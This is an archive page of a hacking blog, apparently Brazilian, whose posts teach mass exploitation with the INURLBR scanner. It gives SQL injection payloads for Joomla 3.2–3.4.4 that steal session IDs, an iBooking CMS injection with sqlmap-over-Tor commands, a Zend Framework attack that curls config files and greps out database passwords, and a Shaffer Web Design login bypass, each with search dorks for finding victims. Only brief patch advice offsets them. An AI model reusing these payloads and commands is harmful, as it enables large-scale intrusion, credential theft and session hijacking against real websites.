Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador INURLBR. Mostrar todas as postagens
Mostrando postagens com marcador INURLBR. Mostrar todas as postagens

terça-feira, 27 de outubro de 2015

Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access / inurlbr scanner for mass exploitation.

Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.  Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.  CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.  CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.  The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.


Joomla CMS that affects more than 2.8 million sites.
Joomla is probably one of web content management (or CMS) more used to creating websites at the enterprise level but also widely used for developing personal websites.
It is an Open source software under the GNU / GPL license, being updated by a community of programmers organized a non-profit structure (Joomla.org).
According to Trustwave joomla CMS (3.2 to 3.4.4) have serious security flaws enabling SQL Injection-type attacks which allow attackers to "win" platform Administrator privileges

Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.

Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.

CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.

CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.

The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4.
Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable.
Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.
Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
Source INFO-> [  More Info ]

It was found that the following code snippet is vulnerable SQLI:
PWD: /administrator/components/com_contenthistory/models/history.php
The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research. Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5. Source-> more info  It was found that the following code snippet is vulnerable SQLI: PWD: /administrator/components/com_contenthistory/models/history.php
FUNCTION FULL:
 /**
  * Build an SQL query to load the list data.
  *
  * @return  JDatabaseQuery
  *
  * @since   3.2
  */
 protected function getListQuery()
 {
  // Create a new query object.
  $db = $this->getDbo();
  $query = $db->getQuery(true);

  // Select the required fields from the table.
  $query->select(
   $this->getState(
    'list.select',
    'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
    'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
   )
  )
  ->from($db->quoteName('#__ucm_history') . ' AS h')
  ->where($db->quoteName('h.ucm_item_id') . ' = ' . $this->getState('item_id'))
  ->where($db->quoteName('h.ucm_type_id') . ' = ' . $this->getState('type_id'))

  // Join over the users for the editor
  ->select('uc.name AS editor')
  ->join('LEFT', '#__users AS uc ON uc.id = h.editor_user_id');

  // Add the list ordering clause.
  $orderCol = $this->state->get('list.ordering');
  $orderDirn = $this->state->get('list.direction');
  $query->order($db->quoteName($orderCol) . $orderDirn);

  return $query;
 }
CODE FULL:
http://pastebin.com/9FnPuns5

PoC:
REQUEST GET
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

It is possible to extract session ID (cookies) of users logged into the system and set in your browser.
REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)  It is possible to extract session ID (cookies) of users logged into the system and set in your browser.
Video demonstration:


In this article we will work SQLI exploitation.

RETURN REQUEST - Exemple Explotation:
URL:
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)
PRINT REQUEST:
PoC: REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)   RETURN REQUEST - Exemple Explotation: URL: http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)  PRINT REQUEST:

Base validation:
ENCODER HEX =  :INURLBR: 
RESULT =                0x203a494e55524c42523a20

INJECT: 0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20....
DORK:
  1. components/com_contenthistory/
  2. inurl:com_contenthistory
  3. index.php?option=com_contenthistory
  4. "index of" components/com_contenthistory/
  5. inurl:"components/com_contenthistory/"
  6. inurl:"index.php?option=com_contenthistory"
Search demonstration:
DORK: components/com_contenthistory/ "index of" components/com_contenthistory/ inurl:"components/com_contenthistory/"

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
 --dork 'YOU_DORK'
 OR
 --dork-file 'YOU_FILE_DORK.txt'

SET SEARCH ENGINES:
-q all
  we will use all the search engines available in the script

SET OUTPUT FILE:
 -s com_contenthistory.txt

SET TIPE VALIDATION:
 -t 2
    2 The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'
              It also establishes connection with the exploit through the get method.

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.localhost.br/user?id=313032303330

--exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))'

hex(INURLBR) = 494e55524c4252

Example injection:
http://www.target.localhost.br/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))

SET STRING VALIDATION:
Specify the string that will be used on the search script:
     Example:  -a {string}
     Usage:    -a '<title>hello world</title>'
     If specific value is found in the target he is considered vulnerable.
     Setting:   -a 'INURLBR'

SET FILTER RESULTS:
 --unique
   Filter results in unique domains.
   removes all gets the URL

Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

COMMAND FULL: 
php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique


Execution return:
 SET STRING VALIDATION: Specify the string that will be used on the search script:      Example:  -a {string}      Usage:    -a '<title>hello world</title>'      If specific value is found in the target he is considered vulnerable.      Setting:   -a 'INURLBR'  SET FILTER RESULTS:  --unique    Filter results in unique domains.    removes all gets the URL  Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.  COMMAND FULL:  php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique   Execution return:


SOLUTION:Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html

Source INFO-1-> https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0

Source INFO-2-> https://cxsecurity.com/issue/WLB-2015100146

terça-feira, 15 de setembro de 2015

( 0day ) IBOOKING CMS - INJEÇÃO DE SQL e Exploração em massa



IBOOKING CMS é um sistema voltado pro ramo de hotelaria, gerenciamento de reservas.
Como próprio site do desenvolvedor diz:

Motor de Reservas: Com o nosso motor de reservas você pode vender as diárias do seu hotel diretamente no seu site e sem precisar pagar comissão. Uma forma eficaz de ampliar sua lucratividade e interagir com o cliente desde o momento da compra.

Tal sistema tem uma falha grave de Injeção SQL, explorada via request GET no parâmetro idPousada do arquivo filtro_faixa_etaria.php dentro da pasta ou URL dinâmica /motor-de-reservas/. INFORMAÇÕES: 

[+] FORNECEDOR: WWW.ibooking.com.br
[+] VERSÕES VULNERÁVEIS: TODAS [+] ARQUIVO: filtro_faixa_etaria.php [+] PASTA OU URL DINÂMICA: /motor-de-reservas [+] PARÂMETRO:  idPousada(GET)
[+] DORK: intext:"Desenvolvido por ibooking" [+] REPORTADO: 15/10/2015

A request vulneravel é feito através de uma function javascript encontrada dentro de /motor-de-reservas

Código:
jQuery(function($){        
   $("#quartos").change(function() {
     var qtde_quartos = $(this).val(); 
     $.ajax({ 
       type: "GET", 
       url: "filtro_faixa_etaria.php", 
       data: "qtde_quartos="+qtde_quartos+"&idPousada=61", 
       success: function(xml){ 
        $("#filtro_faixa_etaria").html(xml);
       } 
     }); 
  }); 
  
  $.ajax({ 
    type: "GET", 
    url: "filtro_faixa_etaria.php", 
    data: "qtde_quartos=1&idPousada=61", 
    success: function(xml){ 
      $("#filtro_faixa_etaria").html(xml);
    } 
  }); 
  
   
 });


URL Vulnerável:

http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61

POC:

http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(INJEÇÃO_SQL) Exemplo:

http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)

Detalhes na injeção SQL é usado FUNCTIONS básicas de injeção, mas seu diferencial é uso de variáveis Globais do MySQL.

@@GLOBAL.version = VERSÃO BANCO DE DADOS MYSQL
@@GLOBAL.version_compile_os = SERVIDOR COMPILADO
@@GLOBAL.version_compile_machine = TIPO DE ARQUITETURA  DO SERVIDOR

Também passo a string ::INURLBR_VULN:: no formato hexadecimal, para assim posteriormente validar se a injeção ocorreu como esperado.
0x203a3a494e55524c42525f56554c4e3a3a20 = ::INURLBR_VULN::

Print saída da injeção:
Detalhes na injeção SQL é usado FUNCTIONS básicas de injeção, mas seu diferencial é uso de variáveis Globais do MySQL.  @@GLOBAL.version = VERSÃO BANCO DE DADOS MYSQL @@GLOBAL.version_compile_os = SERVIDOR COMPILADO @@GLOBAL.version_compile_machine = TIPO DE ARQUITETURA  DO SERVIDOR  Também passo a string ::INURLBR_VULN:: no formato hexadecimal, para assim posteriormente validar se a injeção ocorreu como esperado. 0x203a3a494e55524c42525f56554c4e3a3a20 = ::INURLBR_VULN::  Print saída da injeção:


Exploração em massa usando scanner INURLBR
Baixar: https://github.com/googleinurl/SCANNER-INURLBR

Montando comando:

SETANDO DORK DE PESQUISA
--dork 'YOU_DORK'
- USE --dork 'intext:"Desenvolvido por ibooking"'

SETANDO ARQUIVO DE SAÍDA:
- USE: -s 'ibooking.txt'

SETANDO STRING EXPLOIT GET
--exploit-get 'EXPLOIT_GET'
- USE--exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'

SETANDO TIPO DE VALIDAÇÃO: 
- USE: -t 3 
3 O terceiro tipo tenta válido o erro definido por: -a 'VALUE_INSIDE_THE _target " mais as validações padrões do scanner, o diferencial é que  --exploit-get é injetado direto na url:
Exemplo: --exploit-get '/index.php?id=1&file=conect.php'INJEÇÃO URL: http://www.target.br/index.php?id=1&file=conect.php

SETANDO STRING DE VALIDAÇÃO:
Especifique a string que será usada como validação no script:
Exemplo:  -a {string}
Usando:    -a '<title>hello world</title>'
Se o valor específico é encontrado no alvo, ele é considerado vulnerável.
- USE:     -a 'INURLBR_VULN'
O valor INURLBR_VULN é passado no formato hexadecimal na string exploit-get

COMANDO COMPLETO:

php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t-a 'INURLBR_VULN'

Print saída:

Montando comando:  SETANDO DORK DE PESQUISA --dork 'YOU_DORK' - USE --dork 'intext:"Desenvolvido por ibooking"'  SETANDO ARQUIVO DE SAÍDA: - USE: -s 'ibooking.txt'  SETANDO STRING EXPLOIT GET --exploit-get 'EXPLOIT_GET' - USE: --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'  SETANDO TIPO DE VALIDAÇÃO:  - USE: -t 3  3 O segundo tipo tenta válido o erro definido por: -a 'VALUE_INSIDE_THE _target " o parametro get setando no comando --exploit-get é injetado direto na url: Exemplo: --exploit-get '/index.php?id=1&file=conect.php' INJEÇÃO URL: http://www.target.br/index.php?id=1&file=conect.php  SETANDO STRING DE VALIDAÇÃO: Especifique a string que será usada como validação no script: Exemplo:  -a {string} Usando:    -a '<title>hello world</title>' Se o valor específico é encontrado no alvo, ele é considerado vulnerável. - USE:     -a 'INURLBR_VULN'  COMANDO COMPLETO:  php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN'  Print saída:


EXPLORANDO VIA SQLMAP:

python sqlmap.py -u 'http://ww.target.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61' --dbs --random-agent --tor --tor-type=SOCKS5 -p idPousada --answers='follow=N,union-char=Y,time-sec=10,level=3,risk=2,dbms=MySQL,testing=Y,WAF/IPS/IDS=Y,check=Y'



EXPLORANDO INURLBR + SQLMAP:
Usando parâmetro da ferramenta inurlbr --command-vul, vai executar comando sqlmap quando constatar uma possível vulnerabilidade de acordo com as informações passadas.

php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN' --command-vul "python sqlmap -u 'http://_TARGET_/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61' --dbs --random-agent --tor --tor-type=SOCKS5 -p idPousada --answers='follow=N,union-char=Y,time-sec=2,level=3,risk=2,dbms=MySQL,technique=BEUS,testing=Y,WAF/IPS/IDS=Y,check=Y' --flush-session"

Print saída: 
  EXPLORANDO INURLBR + SQLMAP: Usando parâmetro da ferramenta inurlbr --command-vul, vai executar comando sqlmap quando constatar uma possível vulnerabilidade de acordo com as informações passadas.  php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN' --command-vul "python sqlmap -u 'http://_TARGET_/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61' --dbs --random-agent --tor --tor-type=SOCKS5 -p idPousada --answers='follow=N,union-char=Y,time-sec=2,level=3,risk=2,dbms=MySQL,technique=BEUS,testing=Y,WAF/IPS/IDS=Y,check=Y' --flush-session"



Use Prepares  statement sem moderação:
http://php.net/manual/pt_BR/pdo.prepare.php

Filtro de request seja POST ou GET:

O arquivo aparecendo ou não para o cliente, ele pode ser vulnerável do mesmo jeito.


Outra falha que foi encontrada no sistema semana passada de titulo:
(0day) IBOOKING CMS - LOCAL FILE DISCLOSURE VULNERABILITY
Encontrada por: Pablo Verlly Moreira, que já foi reportada e corrigida pelo admin, mas sem nem um agradecimento por parte da equipe.

https://ghostbin.com/paste/e99uz

Referencias:

terça-feira, 8 de setembro de 2015

Explorando falha no Zend Framework Full Info Disclosure again! again!

3xpl0r4nd0 Z3nd Fr4m3w0rk Full 1nf0 D15cl05ur3

4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n!   Pois bem meus amigos o blog estava meio parado devido algumas coisas que tenho feito, mas arrumei um tempinho as 3 da madruga pra escrever esse humilde texto e passar algo meio velho, mas que ainda está em alta. devido a falta de atenção de muitos desenvs & admins.  Trata-se de uma falha no Framework Zend que possibilita acessar arquivos de configuração da aplicação local.  Acessar informações como:

4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 

Pois bem meus amigos o blog estava meio parado devido algumas coisas que tenho feito, mas arrumei um tempinho as 3 da madruga pra escrever esse humilde texto e passar algo meio velho, mas que ainda está em alta. devido a falta de atenção de muitos desenvs & admins.
Trata-se de uma falha no Framework Zend que possibilita acessar arquivos de configuração da aplicação local.
Acessar informações como:
  1. 'mail.transport.username'
  2. 'mail.transport.password'
  3. 'db.adapter'
  4. 'db.params.host'
  5. 'db.params.username'
  6. 'db.params.password'
  7. 'db.params.dbname'
Exemplo:
resources.mail.transport.host ="smtp.target.com.br"
resources.mail.transport.auth = "loginre"
sources.mail.transport.username = "wangxydlutre"
sources.mail.transport.password = "12333"
resources.db.adapter = "PDO_MYSQL"
resources.db.params.host = "mysql.target.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123456"
resources.db.params.dbname = "db_app_teste"

Tais informações são encontradas no arquivo application.ini,db.ini,config.ini dentro da pasta /application/configs.

Exemplo de estrutura URL:
  • http://{taget}/pasta/application/configs/{arquivo}.ini
  • http://{taget}/application/configs/{arquivo}.ini
Acessando arquivo via CURL:
curl 'http://{target}/application/configs/application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)'

Acessando arquivo via CURL: curl 'http://{target}/application/configs/application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)'

Com o conceito de como acessar tal arquivo e do que podemos encontrar no mesmo, vamos para buscar servidores.

DORK[s]:

  • site:br index of "/application/configs/"
  • inurl:/application/configs/application.ini
  • site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"
  • -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini
  • inurl:/configs/ "params.password" db.ini ext:ini
  • -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password

Agora vamos explora em massa com SCANNER inurlbr

Montar comando baseado nas informações que já sabemos, o principal intuito achar possíveis servidores através de motores de busca e já testar o possível conteúdo de cada url encontrada.
O script INURLBR já possui por padrão um conjunto de strings para tal validação:
        
/* [*]ZEND FRAMEWORK
* Zend-Framework Full Info Disclosure
* The username and password of the database may be obtained trough 
* the "application.ini" file
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';

COMMAND

SET DORK:
--dork '{YOU_DORK}'ou
--dork-file 'arquivo_dorks.txt'
Use:
--dork 'site:br index of "/application/configs/"'ou
--dork-file 'zend-dorks.txt'

SET ARQUIVO DE SAÍDA:
-s '{FILE}'
Use:
-s 'zend.txt'

SET ID DOS MOTORES DE BUSCA:
-q '{ID}'
Use:
-q 1,6,7,14,22

SET FILTRO DE URLS:Só é incluída no loop de testes urls que contenham a string setada em tal parâmetro.
--ifurl '{STRING_VALIDATION}'
Use:
--ifurl 'configs'

SET REPLACE - MANIPULAÇÃO DE URL:
--replace 'OLD_STRIN[INURL]NEW_STRING'
Use:
--replace '/configs[INURL]/configs/application.ini#'

Manipulação de URL exemplo:
URL original vinda do motor de busca ou arquivo:
http://www.target.com.br/pasta/application/configs/languages/de/

URL modificada pelo replace:
http://www.target.com.br/pasta/application/configs/application.ini#/languages/de/

A function substituiu a string /configs por /configs/application.ini# e tudo depois do "#" é ignorado.

SET COMANDO PERSONALIZADO: 
Só vai executar tal comando se o script achar algo que seja considerado vulnerável.
--commnad-vul '{COMMAND_LINE}'
Use:
--command-vul "curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'"
OBS esse comando(command) é somente para mostrar as linhas de senha do arquivo explorado
COMANDO COMPLETO:
php inurlbr.php --dork 'site:br index of "/application/configs/"-s 'zend.txt-q 1,6,7,14,22 --replace '/configs[INURL]/configs/application.ini#--command-vul "curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'"


PRINT OUTPUT:
OBS esse comando(command) é somente para mostrar as linhas de senha do arquivo explorado  COMANDO COMPLETO: php inurlbr.php --dork 'site:br index of "/application/configs/"' -s 'zend.txt' -q 1,6,7,14,22 --replace '/configs[INURL]/configs/application.ini#' --command-vul "curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'"




quinta-feira, 20 de agosto de 2015

Scanner INURLBR explorando via post

(Bom dia, Boa tarde, Boa noite) rsrsrs, Quem vos escreve é googleINURL  venho trazer uma forma diferente de exploração com scanner INURLBR usando request POST.

Quem vos escreve é googleINURL  venho trazer uma forma diferente de exploração com scanner INURLBR usando request POST.  Até o momento a grande utilização do scanner é feito por meio de exploração via  GET e validando valores de retorno, faremos o mesmo porem com comando voltados pro resquest POST.  Para tal tutorial vamos usar um exploit publicado no Exploit4arab Exploit: http://www.exploit4arab.net/exploits/1741 - Exploit Author : GeNeRaL  O XPL trata-se de explorar um falha SQLI do painel de acesso administrativo do site, CMS feito pela empresa Shafferwebdesign.


Até o momento a grande utilização do scanner é feito por meio de exploração via  GET e validando valores de retorno, faremos o mesmo porem com comando voltados pro resquest POST.

Para tal tutorial vamos usar um exploit publicado no Exploit4arab
Exploit:
http://www.exploit4arab.net/exploits/1741 - Exploit Author : GeNeRaL
Affected Webs/Versions : All

O XPL trata-se de explorar um falha SQLI do painel de acesso administrativo do site, CMS feito pela empresa Shafferwebdesign.

Dork:
intext:"by Shaffer Web Design" ext:php
intext:"Designed by Shaffer Web Design" 
intext:"Website Development provided by Shaffer Web Design"

Acesso: 
http://www.xx.com/admin.php

POC:
Request POST
http://www.xx.com/login.php?email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.us/&Submit_Login=Login to My Account

Campos explorados com um simples Bypass:
email='=' 'OR'
password='=' 'OR'

Debug request:
POC: Request POST http://www.xx.com/login.php?email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.us/&Submit_Login=Login to My Account  Campos explorados com um simples Bypass: email='=' 'OR' password='=' 'OR'  Debug request:

  • 1 - Enviamos o request Bypass para o arquivo login.php
  • 2 - O servidor aceita o request e retorna código 302  http de redirecionamento.
  • 3 - Somos redirecionados para pagina my_account.php do servidor.
Agora vamos montar comando para exploração via INURLBR.
Download:

Comando:
- Setar DORK de pesquisa:
Exemplo:
--dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'

Usando para exploração atual:
--dork 'intext:"by Shaffer Web Design" ext:php'

- Setar OUTPUT:
Exemplo:
-s  Specify the output file where it will be saved the vulnerable URLs.
     Example:  -s {file}
     Usage:    -s your_file.txt

Usando para exploração atual:
-s tutorial.txt

- Setar ifredirect validação da URL redirecionamento:
Exemplo:
 --ifredirect  Return validation method post REDIRECT_URL
     Example: --ifredirect {string_validation}
     Usage:   --ifredirect '/admin/painel.php'

Usando para exploração atual:
--ifredirect 'my_account.php'

- Setar string que será concatenada junto ao host, para isso usamos o exploit-get:
Exemplo:
 --exploit-get Defines which exploit will be injected through the GET method to each URL found.
     Example: --exploit-get {exploit_get}
     Usage:   --exploit-get "?'´%270x27;"

Usando para exploração atual:
--exploit-get '/login.php'
Ai fica a pergunta, mas por quê ? eu uso exploit-get em algo que é explorado via post ?
